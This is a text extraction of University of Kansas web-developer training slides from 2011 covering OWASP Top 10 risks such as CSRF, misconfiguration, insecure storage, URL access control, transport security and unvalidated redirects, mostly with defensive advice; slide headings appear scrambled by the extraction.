  98. 98. CROSS SITE REQUEST FORGERY (CSRF) I TE D? P LO T EX I SIHOW A vulnerable web application allows destructive actions (INSERT, UPDATE, DELETE) when using $_GET http://mydomain.com/file.php?action=delete&id=12345
  99. 99. CROSS SITE REQUEST FORGERY (CSRF) I TE D? P LO T EX I SIHOW Destructive actions are executed with minimal or no verification of the origin of the request HTTP POST => http://mydomain.com/file.php?action=delete
  100. 100. CROSS SITE REQUEST FORGERY (CSRF) I TE D? P LO T EX I SIHOW Destructive actions are executed with minimal or no verification of the origin of the request HTTP POST => http://mydomain.com/file.php?action=delete Only marginally more difficult to forge a POST
  101. 101. CROSS SITE REQUEST FORGERY (CSRF) T I T? EN R EV P TOHOW A few easy ways...
  102. 102. CROSS SITE REQUEST FORGERY (CSRF) T I T? EN R EV P TOHOW A few easy ways... Invalidate user sessions quickly
  103. 103. CROSS SITE REQUEST FORGERY (CSRF) T I T? EN R EV P TOHOW A few easy ways... Invalidate user sessions quickly Encourage users to logout (they don’t)
  104. 104. CROSS SITE REQUEST FORGERY (CSRF) T I T? EN R EV P TOHOW A few easy ways... Invalidate user sessions quickly Encourage users to logout (they don’t) Don’t implement “Remember Me” features
  105. 105. CROSS SITE REQUEST FORGERY (CSRF) T I T? EN R EV P TOHOW Implement a CSRF Token Add a secret, not automatically submitted, token to ALL sensitive requests Verify token exists and matches the expected value before executing the request
  106. 106. CROSS SITE REQUEST FORGERY (CSRF) T I T? EN R EV P TOHOW Implement a CSRF Token Generate token and store in users session Source: http://shiflett.org/articles/cross-site-request-forgeries
  107. 107. CROSS SITE REQUEST FORGERY (CSRF) T I T? EN R EV P TOHOW Implement a CSRF Token Use token in POST form Source: http://shiflett.org/articles/cross-site-request-forgeries
  108. 108. CROSS SITE REQUEST FORGERY (CSRF) T I T? EN R EV P TOHOW Implement a CSRF Token Validate when POST received Source: http://shiflett.org/articles/cross-site-request-forgeries
  109. 109. SECURITY MISCONFIGURATION
  110. 110. SECURITY MISCONFIGURATION SI T? I HAT Running web applications on a secure foundationW
  111. 111. SECURITY MISCONFIGURATION SI T? I HAT Running web applications on a secure foundationW From the Operating System up through Apache All PHP extensions All installed libraries on the server
  112. 112. SECURITY MISCONFIGURATION T PAC IM Technical Impact: AL MODERATE ICT YP
  113. 113. SECURITY MISCONFIGURATION T PAC IM Technical Impact: AL MODERATE ICT YP Install backdoor through missing security patch
  114. 114. SECURITY MISCONFIGURATION T PAC IM Technical Impact: AL MODERATE ICT YP Install backdoor through missing security patch Install malware on the server
  115. 115. SECURITY MISCONFIGURATION T PAC IM Technical Impact: AL MODERATE ICT YP Install backdoor through missing security patch Install malware on the server “Root” the server
  116. 116. SECURITY MISCONFIGURATION T PAC IM Technical Impact: AL MODERATE ICT YP Install backdoor through missing security patch Install malware on the server “Root” the server All your data is stolen
  117. 117. SECURITY MISCONFIGURATION I TE D? P LO T EX I SIHOW Source: Dave Wichers OWASP Top 10 Presentation
  118. 118. SECURITY MISCONFIGURATION T I T? EN R EV P TOHOW
  119. 119. SECURITY MISCONFIGURATION T I T? EN R EV P TOHOW SYSTEM LEVEL Update to latest application versions Install security patches Monitor vulnerabilities list
  120. 120. SECURITY MISCONFIGURATION T I T? EN R EV P TO OWKU ITH D SYSTEM LEVEL OES T HIS F Update to latest application versions Install security patches OR YO Monitor vulnerabilities list U
  121. 121. SECURITY MISCONFIGURATION T I T? EN R EV P TOHOW APPLICATION LEVEL Use latest available version of PHP Update third-party software when available Monitor mailing lists
  122. 122. SECURITY MISCONFIGURATION T I T? EN R EV P TOHOW APPLICATION LEVEL Use latest available version of PHP Update third-party software when available Monitor mailing lists
  123. 123. INSECURE CRYPTOGRAPHIC STORAGE
  124. 124. INSECURE CRYPTOGRAPHIC STORAGE SI T? I Incorrectly storing and transmitting HATW confidential data
  125. 125. INSECURE CRYPTOGRAPHIC STORAGE SI T? I Incorrectly storing and transmitting HATW confidential data Database data Log files Backup files Password files
  126. 126. INSECURE CRYPTOGRAPHIC STORAGE SI T? I HAT What is considered secure data at KU?W Data protected by FERPA Data protected by GLB Data subject to PCI (credit or payment card industry) standards Data subject to other Federal or state confidentiality laws Donor or prospect information Passwords and PINs Personally Identifiable Information (“PII”) Personnel data Individually identifiable information created and collected by research projects Certain research data with National Security implications Data subject to protection pursuant to non-disclosure agreements Audit working papers Data protected by attorney/client privilege Email covering topics listed above Source: https://documents.ku.edu/policies/Information_Services/APPENDIX_1_Data_Classif_Policy.htm
  127. 127. INSECURE CRYPTOGRAPHIC STORAGE SI T? I HAT What is considered secure data at KU?W Data protected by FERPA Data protected by GLB Data subject to PCI (credit or payment card industry) standards Data subject to other Federal or state confidentiality laws Donor or prospect information Passwords and PINs Personally Identifiable Information (“PII”) Personnel data Individually identifiable information created and collected by research projects Certain research data with National Security implications Data subject to protection pursuant to non-disclosure agreements Audit working papers Data protected by attorney/client privilege Email covering topics listed above THIS LIST IS NOT ALL INCLUSIVE Source: https://documents.ku.edu/policies/Information_Services/APPENDIX_1_Data_Classif_Policy.htm
  128. 128. INSECURE CRYPTOGRAPHIC STORAGE T PAC IM IC AL Technical Impact:T YPSEVERE
  129. 129. INSECURE CRYPTOGRAPHIC STORAGE T PAC IM IC AL Technical Impact:T YPSEVERE Attacker accesses or modifies confidential data Intellectual property stolen You or KU might get sued Makes the company look bad in the press
  130. 130. INSECURE CRYPTOGRAPHIC STORAGE T PAC IM IC AL Business Impacts:T YPSEVERE High risk of... significant financial loss legal liability public distrust harm ...if this data is disclosed
  131. 131. INSECURE CRYPTOGRAPHIC STORAGE I TE D? P LO T EX I SIHOW Source: Dave Wichers OWASP Top 10 Presentation
  132. 132. INSECURE? CRYPTOGRAPHIC STORAGE T IT EN R EV P TOHOW
  133. 133. INSECURE? CRYPTOGRAPHIC STORAGE T IT EN R EV P TOHOW Identify all sensitive data and all places it is stored
  134. 134. INSECURE? CRYPTOGRAPHIC STORAGE T IT EN R EV P TOHOW Identify all sensitive data and all places it is stored Don’t store private data in public_html
  135. 135. INSECURE? CRYPTOGRAPHIC STORAGE T IT EN R EV P TOHOW Identify all sensitive data and all places it is stored Don’t store private data in public_html Don’t invent your own encryption algorithm
  136. 136. INSECURE? CRYPTOGRAPHIC STORAGE T IT EN R EV P TOHOW Identify all sensitive data and all places it is stored Don’t store private data in public_html Don’t invent your own encryption algorithm Don’t transmit confidential data over unencrypted means
  137. 137. FAILURE TO RESTRICT URL ACCESS
  138. 138. FAILURE TO RESTRICT URL ACCESS SI T? I HAT Unauthorized users can view private pagesW Public users could access your admin functionality
  139. 139. FAILURE TO RESTRICT URL ACCESS T PAC IM Technical Impact: AL MODERATE ICT YP
  140. 140. FAILURE TO RESTRICT URL ACCESS T PAC IM Technical Impact: AL MODERATE ICT YP Attackers invoke functions and services they’re not authorized for Access other user’s accounts and data Perform privileged actions
  141. 141. FAILURE TO RESTRICT URL ACCESS I TE D? P LO T EX I SIHOW User accesses URL http://mydomain.com/user/profile User changes role of URL http://mydomain.com/manager/profile http://mydomain.com/admin/profile
  142. 142. FAILURE TO RESTRICT URL ACCESS I TE D? P LO T EX I SIHOW Presentation Layer Access Control
  143. 143. FAILURE TO RESTRICT URL ACCESS I TE D? P LO T EX I SIHOW Presentation Layer Access Control DOESN’T WORK
  144. 144. FAILURE TO RESTRICT URL ACCESS I TE D? P LO T EX I SIHOW Unlinked URLs http://mydomain.com/you/will/never/find/this/index.html
  145. 145. FAILURE TO RESTRICT URL ACCESS I TE D? P LO T EX I SIHOW Unlinked URLs http://mydomain.com/you/will/never/find/this/index.html DOESN’T WORK
  146. 146. FAILURE ?TO RESTRICT URL ACCESS T IT EN R EV P TO Check credentials on every pageHOW
  147. 147. FAILURE ?TO RESTRICT URL ACCESS T IT EN R EV P TO Check credentials on every pageHOW Disallow requests to unauthorized page types http://mydomain.com/uploads
  148. 148. FAILURE ?TO RESTRICT URL ACCESS T IT EN R EV P TO Check credentials on every pageHOW Disallow requests to unauthorized page types http://mydomain.com/uploads Test it!
  149. 149. INSUFFICIENT TRANSPORT LAYER PROTECTION
  150. 150. INSUFFICIENT TRANSPORT LAYER PROTECTION SI T? I HAT W
  151. 151. INSUFFICIENT TRANSPORT LAYER PROTECTION SI T? I Sending confidential data over HAT W
  152. 152. INSUFFICIENT TRANSPORT LAYER PROTECTION SI T? I Sending confidential data over HAT W unencrypted protocols
  153. 153. INSUFFICIENT TRANSPORT LAYER PROTECTION SI T? I Sending confidential data over HAT W unencrypted protocols Failure to identify all sensitive data
  154. 154. INSUFFICIENT TRANSPORT LAYER PROTECTION SI T? I Sending confidential data over HAT W unencrypted protocols Failure to identify all sensitive data Failure to identify all places sensitive data is sent
  155. 155. INSUFFICIENT TRANSPORT LAYER PROTECTION SI T? I Sending confidential data over HAT W unencrypted protocols Failure to identify all sensitive data Failure to identify all places sensitive data is sent Between:
  156. 156. INSUFFICIENT TRANSPORT LAYER PROTECTION SI T? I Sending confidential data over HAT W unencrypted protocols Failure to identify all sensitive data Failure to identify all places sensitive data is sent Between: Server and user
  157. 157. INSUFFICIENT TRANSPORT LAYER PROTECTION SI T? I Sending confidential data over HAT W unencrypted protocols Failure to identify all sensitive data Failure to identify all places sensitive data is sent Between: Server and user Backend databases
  158. 158. INSUFFICIENT TRANSPORT LAYER PROTECTION SI T? I Sending confidential data over HAT W unencrypted protocols Failure to identify all sensitive data Failure to identify all places sensitive data is sent Between: Server and user Backend databases Colleagues
  159. 159. INSUFFICIENT TRANSPORT LAYER PROTECTION SI T? I Sending confidential data over HAT W unencrypted protocols Failure to identify all sensitive data Failure to identify all places sensitive data is sent Between: Server and user Backend databases Colleagues Internal Communications
  160. 160. INSUFFICIENT TRANSPORT LAYER PROTECTION CT PA IM Technical Impact: AL MODERATE ICT YP
  161. 161. INSUFFICIENT TRANSPORT LAYER PROTECTION CT PA IM Technical Impact: AL MODERATE ICT YP Expose users’ confidential data Account theft
  162. 162. INSUFFICIENT ?TRANSPORT LAYER PROTECTION T ED I P LO T EX I SIHOW Does your application... Use confidential data?
  163. 163. INSUFFICIENT ?TRANSPORT LAYER PROTECTION T ED OI PL T EX I SI What is considered secure data at KU?HOW Data protected by FERPA Data protected by GLB Data subject to PCI (credit or payment card industry) standards Data subject to other Federal or state confidentiality laws Donor or prospect information Passwords and PINs Personally Identifiable Information (“PII”) Personnel data Individually identifiable information created and collected by research projects Certain research data with National Security implications Data subject to protection pursuant to non-disclosure agreements Audit working papers Data protected by attorney/client privilege Email covering topics listed above Source: https://documents.ku.edu/policies/Information_Services/APPENDIX_1_Data_Classif_Policy.htm
  164. 164. INSUFFICIENT ?TRANSPORT LAYER PROTECTION T ED I P LO T EX I SIHOW
  165. 165. INSUFFICIENT ?TRANSPORT LAYER PROTECTION T ED I P LO T EX I SIHOW Does your application...
  166. 166. INSUFFICIENT ?TRANSPORT LAYER PROTECTION T ED I P LO T EX I SIHOW Does your application... Use confidential data?
  167. 167. INSUFFICIENT ?TRANSPORT LAYER PROTECTION T ED I P LO T EX I SIHOW Does your application... Use confidential data? Send it over email?
  168. 168. INSUFFICIENT ?TRANSPORT LAYER PROTECTION T ED I P LO T EX I SIHOW Does your application... Use confidential data? Send it over email? Send it to a database?
  169. 169. INSUFFICIENT ?TRANSPORT LAYER PROTECTION T ED I P LO T EX I SIHOW Does your application... Use confidential data? Send it over email? Send it to a database? Use HTTPS for ALL authentication requests?
  170. 170. INSUFFICIENT ?TRANSPORT LAYER PROTECTION T ED I P LO T EX I SIHOW
  171. 171. INSUFFICIENT ?TRANSPORT LAYER PROTECTION T ED I P LO T EX I SIHOW Do you...
  172. 172. INSUFFICIENT ?TRANSPORT LAYER PROTECTION T ED I P LO T EX I SIHOW Do you... Have encrypted email setup between colleagues?
  173. 173. INSUFFICIENT ?TRANSPORT LAYER PROTECTION T ED I P LO T EX I SIHOW Do you... Have encrypted email setup between colleagues? Use encrypted IM chat between colleagues?
  174. 174. INSUFFICIENT ?TRANSPORT LAYER PROTECTION T ED I P LO T EX I SIHOW Do you... Have encrypted email setup between colleagues? Use encrypted IM chat between colleagues? Store your account passwords in a password safe?
  175. 175. INSUFFICIENT TRANSPORT LAYER PROTECTION I T? T EN R EV P TOHOW Don’t use KU Email Form to send confidential data
  176. 176. INSUFFICIENT TRANSPORT LAYER PROTECTION I T? T EN R EV P TOHOW Don’t use KU Email Form to send confidential data 1. Build a web form that stores it in a secure database
  177. 177. INSUFFICIENT TRANSPORT LAYER PROTECTION I T? T EN R EV P TOHOW Don’t use KU Email Form to send confidential data 1. Build a web form that stores it in a secure database 2. Build a page to download or browse the info
  178. 178. INSUFFICIENT TRANSPORT LAYER PROTECTION I T? T EN R EV P TOHOW Don’t use KU Email Form to send confidential data 1. Build a web form that stores it in a secure database 2. Build a page to download or browse the info 3. Only allow specific users to access it using Shibboleth
  179. 179. INSUFFICIENT TRANSPORT LAYER PROTECTION I T? T EN R EV P TOHOW Don’t use KU Email Form to send confidential data 1. Build a web form that stores it in a secure database 2. Build a page to download or browse the info 3. Only allow specific users to access it using Shibboleth
  180. 180. INSUFFICIENT TRANSPORT LAYER PROTECTION I T? T EN R EV P TOHOW Use secure protocols to transmit and store data
  181. 181. INSUFFICIENT TRANSPORT LAYER PROTECTION I T? T EN R EV P TOHOW Use secure protocols to transmit and store data Ever try to FTP to www2.ku.edu without SFTP?
  182. 182. INSUFFICIENT TRANSPORT LAYER PROTECTION I T? T EN R EV P TOHOW Use secure protocols to transmit and store data Ever try to FTP to www2.ku.edu without SFTP? Store confidential data in our secure Oracle database
  183. 183. INSUFFICIENT TRANSPORT LAYER PROTECTION I T? T EN R EV P TOHOW Require HTTPS on all secure pages
  184. 184. INSUFFICIENT TRANSPORT LAYER PROTECTION I T? T EN R EV P TOHOW Require HTTPS on all secure pages
  185. 185. INSUFFICIENT TRANSPORT LAYER PROTECTION I T? T EN R EV P TOHOW Setup email encryption between colleagues http://www.technology.ku.edu/ca/install/
  186. 186. INSUFFICIENT TRANSPORT LAYER PROTECTION I T? T EN R EV P TOHOW Setup Off-The-Record chat encryption http://www.h-i-r.net/2011/01/introduction-to-encrypted-internet-chat.html
  187. 187. INSUFFICIENT TRANSPORT LAYER PROTECTION I T? T EN R EV P TOHOW KeePass Windows: http://keepass.info/ Mac: http://www.keepassx.org/ Free & Open-Source
  188. 188. UNVALIDATED REDIRECTS AND FORWARDS
  189. 189. UNVALIDATED REDIRECTS AND FORWARDS SI T? I HATW URL Redirects built by the web application can be exploited if unvalidated Appears as a valid URL but contains a payload Internal redirects are common External redirects are becoming more common
  190. 190. UNVALIDATED REDIRECTS AND FORWARDS CT PA IM Technical Impact: AL MODERATE ICT YP Install malware Phishing site Bypass authorization controls
  191. 191. UNVALIDATED REDIRECTS AND FORWARDS TE D? I P LO T EX I SIHOW Source: Dave Wichers OWASP Top 10 Presentation
  192. 192. UNVALIDATED REDIRECTS AND FORWARDS I T? T EN R EV P TOHOW Avoid using redirects and forwards as much as possible If used, don’t use user-input parameters If using user-input... Use Array Map to Whitelist URL Parameters
  193. 193. UNVALIDATED REDIRECTS AND FORWARDS I T? T EN R EV Use Array Map to P Whitelist URL Parameters TOHOW
  194. 194. Questions?
  195. 195. My Challenge to you Read the OWASP Wiki http://www.owasp.org Review your code http://www.owasp.org/index.php/Code_Review_Guidehttp://www.owasp.org/index.php/OWASP_Testing_Project
  196. 196. SourcesOWASP Sources:- OWASP Application Security Verification Standard Project. <http://www.owasp.org/index.php/ASVS>- OWASP Authentication Cheat Sheet. <http://www.owasp.org/index.php/Authentication_Cheat_Sheet>- OWASP Code Review Project. <http://www.owasp.org/index.php/Code_Review_Guide>- OWASP Testing Project. <http://www.owasp.org/index.php/OWASP_Testing_Project>- OWASP Top 10 - 2010: The Top 10 Most Critical Web Application Security Risks. Dave Wichers, OWASP Board Member. <http://owasptop10.googlecode.com/files/OWASP_Top_10_-_2010%20Presentation.pptx>- OWASP XSS (Cross Site Scripting) Prevention Cheat Sheet. <http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet>Links:- Setting up encrypted email at KU. http://www.technology.ku.edu/ca/install/- Introduction to Encrypted Internet Chat. http://www.h-i-r.net/2011/01/introduction-to-encrypted-internet-chat.htmlSoftware:- HTMLPurifier <http://htmlpurifier.org/>- KeePass <http://keepass.info/>- KeePassX <http://www.keepassx.org/>- WebScarab <http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project>Photos:http://www.flickr.com/photos/mrbenn/2337943659/http://www.flickr.com/photos/12836528@N00/4294660659/ John Kary | johnkary@ku.eduhttp://xkcd.com/327/ Web Development & Interface Design University of Kansas, Information Technology January 2011 KU Web Developers Meeting

×